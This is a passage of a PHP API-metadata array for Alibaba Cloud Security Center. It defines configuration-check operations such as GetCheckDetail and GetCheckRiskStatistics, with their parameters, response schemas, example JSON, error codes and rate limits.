'vpc-uf60agqq65bs98zoo****'."\n", 'title' => ''], 'CheckShowName' => ['title' => '', 'description' => 'Check item display name', 'type' => 'string', 'example' => '开启公网访问'], 'VendorShowName' => ['title' => '', 'description' => 'Vendor name', 'type' => 'string', 'example' => '阿里云'], ], 'description' => '', 'title' => '', 'example' => '', ], 'example' => '', ], 'StatisticType' => ['description' => 'The type of the statistics. Valid values:'."\n" ."\n" .'- **user**: the top five users that are granted excessive permissions.'."\n" ."\n" .'- **role**: the top five roles that are granted excessive permissions.'."\n" ."\n" .'- **instance**: the top five cloud services on which risks are detected.', 'type' => 'string', 'example' => 'instance', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"20456DD5-5CBF-5015-9173-12CA4246B***\\",\\n \\"CheckCountStatisticDTO\\": {\\n \\"CheckCountStatisticItems\\": [\\n {\\n \\"InstanceId\\": \\"i-wz9bpxyu6t74qn9g****\\",\\n \\"InstanceName\\": \\"launch-advisor-2021****\\",\\n \\"RiskCount\\": 22,\\n \\"Vendor\\": 0,\\n \\"InstanceType\\": 0,\\n \\"InstanceSubType\\": 0,\\n \\"RegionId\\": \\"cn-shanghai\\",\\n \\"InstanceTypeName\\": \\"ECS\\",\\n \\"InstanceSubTypeName\\": \\"INSTANCE\\",\\n \\"Uuid\\": \\"c9107c04-942f-40c1-981a-f1c1****\\\\n\\",\\n \\"InternetIp\\": \\"1.2.XX.XX\\\\n\\",\\n \\"IntranetIp\\": \\"1.2.XX.XX\\\\n\\",\\n \\"Os\\": \\"linux\\",\\n \\"Cores\\": 2,\\n \\"VpcInstanceId\\": \\"vpc-uf60agqq65bs98zoo****\\\\n\\",\\n \\"CheckShowName\\": \\"开启公网访问\\",\\n \\"VendorShowName\\": \\"阿里云\\"\\n }\\n ],\\n \\"StatisticType\\": \\"instance\\"\\n }\\n}","type":"json"}]', 'title' => 'GetCheckCountStatistic', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckCountStatistic'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCheckCountStatistic', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetCheckDetail' => [ 'summary' => 'Queries the details about a check item that is used for configuration assessment.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '119346', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) operation to query the IDs of check items.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '2', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => [ 'description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese.'."\n" .'* **en**: English.'."\n", 'type' => 'string', 'required' => false, 'enumValueTitles' => ['en' => 'en', 'zh' => 'zh'], 'example' => 'en', 'title' => '', ], ], [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the instance.'."\n" ."\n" .'> You can call the [ListCloudAssetInstances](~~ListCloudAssetInstances~~) operation to query the region ID.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'GetCheckDetailResponse'."\n", 'type' => 'object', 'properties' => [ 'Description' => [ 'description' => 'The description of the check item.'."\n", 'type' => 'object', 'properties' => [ 'Type' => [ 'description' => 'The description type of the check item. The value is fixed as text.'."\n", 'type' => 'string', 'enumValueTitles' => [], 'example' => 'text', 'title' => '', ], 'Value' => ['description' => 'The content in the description of the check item.'."\n", 'type' => 'string', 'example' => 'The MSE instance does not enable authentication by default. If public network access is enabled at the same time, the data in the configuration center may be dragged and there is a security risk.', 'title' => ''], 'Link' => ['description' => 'The link to the description of the check item.'."\n", 'type' => 'string', 'example' => 'https://www.alibabacloud.com/help/en/object-storage-service/latest/tutorial-implement-data-sharing-across-departments-based-on-bucket-policies', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Solution' => [ 'description' => 'The solution to handle the risk item.'."\n", 'type' => 'object', 'properties' => [ 'Type' => [ 'description' => 'The type of the solution to handle the risk item. Valid values:'."\n" ."\n" .'* **text**'."\n" .'* **link**'."\n", 'type' => 'string', 'enumValueTitles' => [], 'example' => 'text', 'title' => '', ], 'Value' => ['description' => 'The content of the solution to handle the risk item when the Type parameter is set to text.'."\n", 'type' => 'string', 'example' => 'Enter the MSE product console - registration and configuration center - instance list, click the corresponding instance name to enter the instance details, find the public network whitelist setting option in the basic information, and configure the whitelist according to business needs. It is forbidden to configure 0.0.0.0 or the whitelist as null.', 'title' => ''], 'Link' => ['description' => 'The link to the solution to handle the risk item when the Type parameter is set to link.'."\n", 'type' => 'string', 'example' => 'https://www.alibabacloud.com/help/en/object-storage-service/latest/tutorial-implement-data-sharing-across-departments-based-on-bucket-policies', 'title' => ''], ], 'title' => '', 'example' => '', ], 'AssistInfo' => [ 'description' => 'The help information about the check item.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the help information about the risk item. Valid values:'."\n" ."\n" .'* **text**'."\n" .'* **link**'."\n", 'type' => 'string', 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'The content in the help information about the risk item when the Type parameter is set to text.'."\n", 'type' => 'string', 'example' => 'Configure an IP address whitelist', 'title' => ''], 'Link' => ['description' => 'The link to the help information about the risk item when the Type parameter is set to link.'."\n", 'type' => 'string', 'example' => 'https://www.alibabacloud.com/help/en/resource-access-management/latest/faq-about-ram-users', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '15A6ED6A-DBFE-5255-A248-289907809BEC', 'title' => ''], 'CustomConfigs' => [ 'description' => 'The custom configuration items of the check item.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the custom configuration item, which is unique in a check item.'."\n", 'type' => 'string', 'example' => 'SessionTimeMax', 'title' => ''], 'TypeDefine' => ['description' => 'The type of the custom configuration item. The value is a JSON string.'."\n", 'type' => 'string', 'example' => '{\\"type\\":\\"NUMBER\\",\\"range\\":[1,24]}', 'title' => ''], 'DefaultValue' => ['description' => 'The default value of the custom configuration item. The value is a string.'."\n", 'type' => 'string', 'example' => '12', 'title' => ''], 'Value' => ['description' => 'The value of the custom configuration item. The value is a string.'."\n", 'type' => 'string', 'example' => '11', 'title' => ''], 'ShowName' => ['description' => 'The display name of the custom configuration item for internationalization.'."\n", 'type' => 'string', 'example' => 'Maximum session time'."\n", 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RepairReset' => ['description' => '> This parameter is deprecated.'."\n", 'type' => 'string', 'deprecated' => true, 'example' => 'true', 'title' => ''], 'RepairSupportType' => ['description' => '> This parameter is deprecated.'."\n", 'type' => 'integer', 'format' => 'int32', 'deprecated' => true, 'example' => '1', 'title' => ''], 'RepairSetting' => [ 'description' => 'The fixing parameter configurations of the check item.'."\n", 'type' => 'object', 'properties' => [ 'RepairSupport' => ['description' => 'Indicates whether the check item supports the quick fix feature. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RepairSupportType' => ['description' => 'The fixing type that is supported. Valid values:'."\n" ."\n" .'* **1**: The fixing and rollback are supported.'."\n" .'* **2**: The fixing is supported, but the rollback is not supported.'."\n" .'* **3**: The fixing must be performed on a third-party platform.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RepairReset' => ['description' => 'Indicates whether a restart is required after the fixing. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true'."\n", 'title' => ''], 'RepairConfigs' => [ 'description' => 'The configurations of the fixing parameters.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the parameter. The name must be unique within the check item.'."\n", 'type' => 'string', 'example' => 'navicat', 'title' => ''], 'TypeDefine' => ['description' => 'The type of the parameter. The value is a JSON string.'."\n", 'type' => 'string', 'example' => '{\\"type\\":\\"NUMBER\\",\\"range\\":[1,24]}'."\n", 'title' => ''], 'DefaultValue' => ['description' => 'The default value of the parameter. The value is a string.'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'Value' => ['description' => 'The user-configured value of the parameter. The value is a string.'."\n", 'type' => 'string', 'example' => '2', 'title' => ''], 'ShowName' => ['description' => 'The display name of the parameter.'."\n", 'type' => 'string', 'example' => 'port', 'title' => ''], 'FlowId' => ['description' => 'The ID of the fixing workflow.'."\n", 'type' => 'string', 'example' => '64312d3ee19d470a9b54393dab****', 'title' => ''], 'CustomFlag' => ['description' => 'Indicates whether custom configurations of the fixing parameters are supported. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'ExclusiveName' => [ 'description' => 'The fixing parameters that are not compatible with this parameter.'."\n", 'type' => 'array', 'items' => ['description' => 'The fixing parameter that is not compatible with this parameter. You cannot configure the two parameters at the same time.'."\n", 'type' => 'string', 'example' => '["port"]', 'title' => ''], 'title' => '', 'example' => '', ], 'ConsoleParamType' => ['description' => 'Indicates whether the value of the parameter is displayed in the console. Valid values:'."\n" ."\n" .'* 0: The historical value and real-time value of the parameter are displayed.'."\n" .'* 1: Only the real-time value of the parameter is displayed.'."\n" .'* 2: The value of the parameter is not displayed in the console.'."\n", 'type' => 'string', 'example' => '0', 'title' => ''], 'DataTransformType' => ['description' => 'Indicates whether data needs to be encrypted during transmission. Valid values:'."\n" ."\n" .'* 0: Data does not need to be encrypted during transmission.'."\n" .'* 1: Data needs to be encrypted during transmission.'."\n" .'* 2: Data needs to be encrypted during transmission, and the user must perform secondary confirmation.'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'UsageType' => ['description' => 'The type of the parameter. Valid values:'."\n" ."\n" .'* 1: asset parameters that are required during fixing.'."\n" .'* 2: user-provided parameters that are required during fixing.'."\n" .'* 3: parameters that are temporarily provided by the user.'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'EmptyParamSwitch' => ['description' => 'Indicates whether this parameter is specified by the user. Valid values:'."\n" ."\n" .'* 0: The default value is used.'."\n" .'* 1: This parameter is required, and no default value is specified.'."\n" .'* 2: This parameter can be left empty.'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'FlowStep' => [ 'description' => 'The description of the fixing workflow.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Step' => ['description' => 'The sequence number of the fixing step.'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'ShowText' => ['description' => 'The text description of the fixing step.'."\n", 'type' => 'string', 'example' => 'The first step is to open the calling interface.', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Description\\": {\\n \\"Type\\": \\"text\\",\\n \\"Value\\": \\"The MSE instance does not enable authentication by default. If public network access is enabled at the same time, the data in the configuration center may be dragged and there is a security risk.\\",\\n \\"Link\\": \\"https://www.alibabacloud.com/help/en/object-storage-service/latest/tutorial-implement-data-sharing-across-departments-based-on-bucket-policies\\"\\n },\\n \\"Solution\\": {\\n \\"Type\\": \\"text\\",\\n \\"Value\\": \\"Enter the MSE product console - registration and configuration center - instance list, click the corresponding instance name to enter the instance details, find the public network whitelist setting option in the basic information, and configure the whitelist according to business needs. It is forbidden to configure 0.0.0.0 or the whitelist as null.\\",\\n \\"Link\\": \\"https://www.alibabacloud.com/help/en/object-storage-service/latest/tutorial-implement-data-sharing-across-departments-based-on-bucket-policies\\"\\n },\\n \\"AssistInfo\\": {\\n \\"Type\\": \\"text\\",\\n \\"Value\\": \\"Configure an IP address whitelist\\",\\n \\"Link\\": \\"https://www.alibabacloud.com/help/en/resource-access-management/latest/faq-about-ram-users\\"\\n },\\n \\"RequestId\\": \\"15A6ED6A-DBFE-5255-A248-289907809BEC\\",\\n \\"CustomConfigs\\": [\\n {\\n \\"Name\\": \\"SessionTimeMax\\",\\n \\"TypeDefine\\": \\"{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"NUMBER\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"range\\\\\\\\\\\\\\":[1,24]}\\",\\n \\"DefaultValue\\": \\"12\\",\\n \\"Value\\": \\"11\\",\\n \\"ShowName\\": \\"Maximum session time\\\\n\\"\\n }\\n ],\\n \\"RepairReset\\": \\"true\\",\\n \\"RepairSupportType\\": 1,\\n \\"RepairSetting\\": {\\n \\"RepairSupport\\": true,\\n \\"RepairSupportType\\": 1,\\n \\"RepairReset\\": true,\\n \\"RepairConfigs\\": [\\n {\\n \\"Name\\": \\"navicat\\",\\n \\"TypeDefine\\": \\"{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"NUMBER\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"range\\\\\\\\\\\\\\":[1,24]}\\\\n\\",\\n \\"DefaultValue\\": \\"1\\",\\n \\"Value\\": \\"2\\",\\n \\"ShowName\\": \\"port\\",\\n \\"FlowId\\": \\"64312d3ee19d470a9b54393dab****\\",\\n \\"CustomFlag\\": true,\\n \\"ExclusiveName\\": [\\n \\"[\\\\\\"port\\\\\\"]\\"\\n ],\\n \\"ConsoleParamType\\": \\"0\\",\\n \\"DataTransformType\\": \\"1\\",\\n \\"UsageType\\": \\"1\\",\\n \\"EmptyParamSwitch\\": \\"1\\"\\n }\\n ],\\n \\"FlowStep\\": [\\n {\\n \\"Step\\": \\"1\\",\\n \\"ShowText\\": \\"The first step is to open the calling interface.\\"\\n }\\n ]\\n }\\n}","type":"json"}]', 'title' => 'GetCheckDetail', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCheckDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetCheckProcess' => [ 'summary' => 'Queries the progress of a cloud platform configuration check task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '119340', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cloud service configuration check task to query.'."\n" .'> You can call the [SubmitCheck](~~SubmitCheck~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '5347c7b6-c85c-4070-846a-3029e08e****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of assets to check.', 'type' => 'integer', 'format' => 'int32', 'example' => '113', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D18B5DAD-BA97-5552-AE48-83F59D5F****', 'title' => ''], 'FinishCount' => ['description' => 'The total number of assets that have been checked.', 'type' => 'integer', 'format' => 'int32', 'example' => '80', 'title' => ''], 'StatusCode' => ['description' => 'The status code of the Cloud Security Posture Management (CSPM) check task. Valid values:'."\n" .'- 0: The task is being initialized and the total number of tasks is being calculated.'."\n" .'- 1: The task is running. You can query the total number of tasks and the number of completed tasks.'."\n" .'- 2: The task is completed.'."\n" .'- 3: The task timed out.'."\n" .'- 4: The task is invalid. Check whether valid assets exist for detection.'."\n" .'- 5: No task record exists. Check whether the TaskId is correct.', 'type' => 'string', 'example' => '1', 'title' => ''], 'TaskId' => ['description' => 'The ID of the cloud service configuration check task to query.', 'type' => 'string', 'example' => '5347c7b6-c85c-4070-846a-3029e08e****'."\n", 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query cloud platform configuration check task progress', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckProcess'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCheckProcess', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 113,\\n \\"RequestId\\": \\"D18B5DAD-BA97-5552-AE48-83F59D5F****\\",\\n \\"FinishCount\\": 80,\\n \\"StatusCode\\": \\"1\\",\\n \\"TaskId\\": \\"5347c7b6-c85c-4070-846a-3029e08e****\\\\n\\"\\n}","type":"json"}]', ], 'GetCheckRiskStatistics' => [ 'summary' => 'Queries the statistics on risk scenarios and check items that are used in the risk scenarios, including the statistics on low-risk, medium-risk, and high-risk items by baseline type.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '141288', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The risk statistics of the check item.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'An array consisting of the statistics on check items that are used in risk scenarios.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The statistics on check items that are used in the risk scenario.'."\n", 'type' => 'object', 'properties' => [ 'SceneName' => ['title' => '', 'description' => 'The name of the risk scenario.'."\n", 'type' => 'string', 'example' => 'SECURITY'], 'LowWarningCount' => ['title' => '', 'description' => 'The number of low-risk items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3'], 'MediumWarningCount' => ['title' => '', 'description' => 'The number of medium-risk items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '29'], 'HighWarningCount' => ['title' => '', 'description' => 'The number of high-risk items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '43'], 'TotalCount' => ['title' => '', 'description' => 'The total number of check items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '219'], 'PassCount' => ['title' => '', 'description' => 'The number of passed check items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '143'], 'SubStatistics' => [ 'description' => 'The statistics on check items that are used in the risk scenario by baseline type.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The statistics on check items that are used in the risk scenario and belong to the baseline type.'."\n", 'type' => 'object', 'properties' => [ 'TypeName' => ['title' => '', 'description' => 'The baseline type.'."\n", 'type' => 'string', 'example' => 'weak_password'], 'Alias' => ['title' => '', 'description' => 'The name of the baseline type.'."\n", 'type' => 'string', 'example' => 'weak_password'], 'LowWarningCount' => ['title' => '', 'description' => 'The number of low-risk items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0'], 'MediumWarningCount' => ['title' => '', 'description' => 'The number of medium-risk items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0'], 'HighWarningCount' => ['title' => '', 'description' => 'The number of high-risk items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3'], 'TotalCount' => ['title' => '', 'description' => 'The total number of check items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5'], 'PassCount' => ['title' => '', 'description' => 'The number of passed check items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of risk scenarios.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '2C455672-2490-5211-84EC-420C7818****', 'title' => ''], 'Summary' => [ 'description' => 'Historical check item statistics.'."\n", 'type' => 'object', 'properties' => [ 'RiskCheckCnt' => ['description' => 'Check items that failed to pass the check.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskWarningCnt' => ['description' => 'Risks to be handled.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'RiskDays' => ['description' => 'Days since check items failed.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'HandledCheckTotal' => ['description' => 'A risk item exists.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'HandledCheckToday' => ['description' => 'Check items handled today.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'HandledDays' => ['description' => 'Total days since check items were handled.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '365', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"SceneName\\": \\"SECURITY\\",\\n \\"LowWarningCount\\": 3,\\n \\"MediumWarningCount\\": 29,\\n \\"HighWarningCount\\": 43,\\n \\"TotalCount\\": 219,\\n \\"PassCount\\": 143,\\n \\"SubStatistics\\": [\\n {\\n \\"TypeName\\": \\"weak_password\\",\\n \\"Alias\\": \\"weak_password\\",\\n \\"LowWarningCount\\": 0,\\n \\"MediumWarningCount\\": 0,\\n \\"HighWarningCount\\": 3,\\n \\"TotalCount\\": 5,\\n \\"PassCount\\": 2\\n }\\n ]\\n }\\n ],\\n \\"Count\\": 3,\\n \\"RequestId\\": \\"2C455672-2490-5211-84EC-420C7818****\\",\\n \\"Summary\\": {\\n \\"RiskCheckCnt\\": 1,\\n \\"RiskWarningCnt\\": 5,\\n \\"RiskDays\\": 30,\\n \\"HandledCheckTotal\\": 3,\\n \\"HandledCheckToday\\": 0,\\n \\"HandledDays\\": 365\\n }\\n}","type":"json"}]', 'title' => 'GetCheckRiskStatistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckRiskStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCheckRiskStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetCheckSale' => [ 'summary' => 'Retrieves the sales information of cloud service configuration check, including the number of authorized quotas and consumed quotas.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The region of the Security Center instance. Valid values:'."\n" ."\n" .'- **cn-hangzhou:** China'."\n" .'- **ap-southeast-1:** outside China.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The China Cloud generates a unique identifier for the request, which can be used for troubleshooting and diagnostics.', 'type' => 'string', 'example' => 'F5CF78A7-30AA-59DB-847F-13EE3AE7****', 'title' => ''], 'CheckSale' => [ 'description' => 'The sales information of cloud service configuration check.', 'type' => 'object', 'properties' => [ 'PurchaseCount' => ['title' => '', 'description' => 'The number of purchased authorized quotas.', 'type' => 'integer', 'format' => 'int64', 'example' => '1000'], 'ConsumeCount' => ['title' => '', 'description' => 'The number of consumed authorized quotas.', 'type' => 'integer', 'format' => 'int64', 'example' => '500'], 'LoyalUser' => ['title' => '', 'description' => 'Indicates whether the user is an existing user who used the cloud service configuration check feature before the sales feature was released (July 7, 2023). Valid values:'."\n" .'- **true**: The user is an existing user.'."\n" .'- **false**: The user is not an existing user.', 'type' => 'boolean', 'example' => 'true'], 'SaleUserType' => ['title' => '', 'description' => 'The sales user type. Valid values:'."\n" .'- **1**: Full-feature user. The user can use all check items.'."\n" .'- **2**: Upgrade-required user. The user can use only the check items that were available before the sales feature was released (July 7, 2023).'."\n" .'- **3**: Purchase-required user. The user cannot use the cloud service configuration check feature.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'InstancePurchaseCount' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], 'InstanceConsumeCount' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], 'InstancePostConsumeCount' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], 'InstanceHybridPostLatestCycledResourceCount' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve cloud service configuration check sales information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckSale'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCheckSale', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F5CF78A7-30AA-59DB-847F-13EE3AE7****\\",\\n \\"CheckSale\\": {\\n \\"PurchaseCount\\": 1000,\\n \\"ConsumeCount\\": 500,\\n \\"LoyalUser\\": true,\\n \\"SaleUserType\\": 1,\\n \\"InstancePurchaseCount\\": 0,\\n \\"InstanceConsumeCount\\": 0,\\n \\"InstancePostConsumeCount\\": 0,\\n \\"InstanceHybridPostLatestCycledResourceCount\\": 0\\n }\\n}","type":"json"}]', ], 